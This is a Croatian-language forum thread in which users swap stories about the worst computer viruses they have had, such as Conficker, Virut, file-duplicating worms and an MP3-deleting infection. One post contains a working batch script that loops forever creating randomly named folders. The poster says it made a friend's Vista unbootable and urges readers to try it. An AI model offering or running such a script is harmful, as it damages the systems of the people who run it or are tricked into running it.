evo sad iman scvhost.exe.....pas mater.
ja mislim daje krivo ime da netrea biti u nazivu "virus" neko "štetni program"
Meni neki .exe file koji je brisao podatke na hardu i oštečivao OS.
ja sam imao crva sam mi je duplao slike...imo sam 500 slika u jednom folderu od nogometa i otvorim i vidis od jedanput sve podpulano ili potriplano rikno sam i tako u par navrata ...LoL
A meni trojanac iz zasjede sve uništio.

A meni trojanac iz zasjede sve uništio.

Jbg,ja se riješio confickera,kad evo ga opet...
evo sad iman scvhost.exe.....pas mater.
Jbg,ja se riješio confickera,kad evo ga opet...
Virut hebeni virut.Izgubio sve podatke na hardu....
moj zadnji virus mi je bio naludi.... win.32Parite.B
to je najgori virus s kojim sam se ikad susreo od kada radim na kompjuteru
Jedan virus koji se koti, bilo ga je oko 40 :S, antivirus nemože sve odjednom izbrisat i resetira komp, kad ga resetira i nastavi brisanje a on se opet nakoti, na malo više, i tako sam nebrojeno puta restartao dok ga nisam uspio izbrisat :D
hmm najgori virus...a da stalno mi hrčko ko krme (nije kaspersky :P) sta god pokrenem on hrkče...i neznam jel to jedna virus bio ali dobio bi ono "Shutdown in 60 sec" kad bi se pokusao spojit na net...
najgori virus mi je bio vitro kad mi je zarazio Nod-a u jednom danu sam 4 puta reinstalira Win...
1. virus brise sve sto bi moglo ga ugrozit
2. virus koji sve brisse (format vrsi) i na USB sve formatira neki Arap napravio logitech smislio antivirus koji ga izbrise
Zvao se Windows, imao sam nekoliko verzija...
lol meni prijatelju uso neki virus na komp, ko neka buba i jede ikone i start, i kako ih pojede nema ih vise (nemoze klikat na njih) i sve ispocetka jede kako palis komp lol
Dobio sam jedan virus koji mi jede "grafičku karticu" pa mi kompjuter više ne raspoznaje grafičku karticu, tj. misli da ju nemam.
Ne znam jesam već napiso ili nisam...
Ugl, najluđi "virus" kojim sam bio zaražen, bilo je djelo mog cimera. Virus je, ovaj, crto, erm... penisiće po ekranu...
Nije uopće jaki ali je zato meni lud.
@echo off
title patch
echo ::::::Pričekajte koju sekundu!::::
cd c:
:mapa
mkdir newfolder_%random%%random%%random%%random%%random%
goto mapa
generira mape random imena. Moj prijatelj je mijenjao Vistu jer je na deskoptu imao oko 16 milijuna mapa!!!!!! nije mogao ni bootati vistu!
Probajte i vi. preko netepada spremite kao .bat skripu i pokrenite. PAZITE KOLIKO ĆETE GA DRŽATI UPALJENIM. MENI JE ZA 3SEC NAPRAVIO 6752 MAPE!
ovo objavljivam dobronamjerno nemojte koristiti ako neznate šta točno radite!!
Ne znam jesam već napiso ili nisam...
Ugl, najluđi "virus" kojim sam bio zaražen, bilo je djelo mog cimera. Virus je, ovaj, crto, erm... penisiće po ekranu...

Dobio sam (još davno) virus koji mi je prikazivao male crviće po ekranu koji bi mi polako "jeli" ekran, pixel po pixel, te bi za sat vremena nestao cijeli ekran. Zatim svaki put kada bih upalio kompjuter bi mi bio crni ekran, te bih trebao 50 puta (nije šala) restartati kompjuter da mi se zatim normalno upali, a zatim mi opet ekran jedu crvi. Nakon što sam jedva uspio obrisati virus, čuo se jedan prodoran i glasan smijeh.
Hm ja sam danas prešao s nod-om po kompu i našao 400 virusa. :P
Evo jedan prijateljski savjet: nikad ne pokušaj crackati nero jer ti se dogodi ovo gore navedeno.
hahaha, ovo s nerom je totalno fail....
Inace, frend je pokupio virus prije nekih 4 god ako se ne varam, zbilja je bilo prije dosta.
Jedino sto je virus "zlocudno" radio je bilo to da nikako nisi mogao promijeniti desktop wallpaper. Nikako. Ni na koji nacin. Jednostavno ti nije dozvoljavao da ga promijenis. A frend je jedan od onih koji wallpapere traze svaki dan i mijenjaju ih nekoliko puta tjedno. I bas njega to zadesilo.
Onak, simpaticno, zar ne?
Uspio se ja riješiti svih 400 gamadi, samo mi se uništio newdev.dll i sada nemrem instalirat drievere i još par stvari ne radi. Probao sam skinuti dll sa par stranica ali ne pomaže.
Imam Vistu, jel netko zna izlaz???
(sorry na offtopicu)
Uspio se ja riješiti svih 400 gamadi, samo mi se uništio newdev.dll i sada nemrem instalirat drievere i još par stvari ne radi. Probao sam skinuti dll sa par stranica ali ne pomaže.
Imam Vistu, jel netko zna izlaz???
(sorry na offtopicu)
Meni je jedan upao, pravio mi duple foldere, i kad otvorim taj folder, otvori mi novi prozor s istim sadrzajem. i svaki folder koji sam imao na kompu, imao je duplikat.
A na poslu je netko donio na USB-u onaj sto dodaje autostart, pa svaki put, moras desnim klikom pa otvori.
a frend mi je DJ u jednom kaficu, i imao oko 15ooo pjesama, i pokupi neki virus koji jede samo mp3, sve otislo u nezaborav, kaze skoro u sekundi samo nestade sve. ostalo par wma i ogg pjesama.
Neznam kako se zvao ali meni je najgori virus bio onaj koji mi je izbrisao sve putanje u prečacima. Znači svaki prečac (shortcut) koji je bio na desktopu i u start izborniku nije radio. Kada bi kliknuo na prečac pojavila mi se ona poruka da datoteka nije nađena i da sam odredim putanju. I pokušao ja tako vratiti ovih par najvažnijih prečaca ali nakon restarta opet bi se izbrisale. Uklonio sam virus, ali šteta je i dalje ostala. Kako mi se nije dalo vraćati sve prečace formatirao sam disk i ponovo instalirao windowse.
U mom pc-u jos uvijek hara nepoznati virus. On svakome, ali bas svakome na msnu salje neke folder viruse, također mi cesto pise na msnu ili gareni(program za igranje dote)da mi je accaunt ukljucen na drugom mjestu. Problem je taj sto sam cijeli pc skenirao, ali mi pise da nema niti musice u njemu.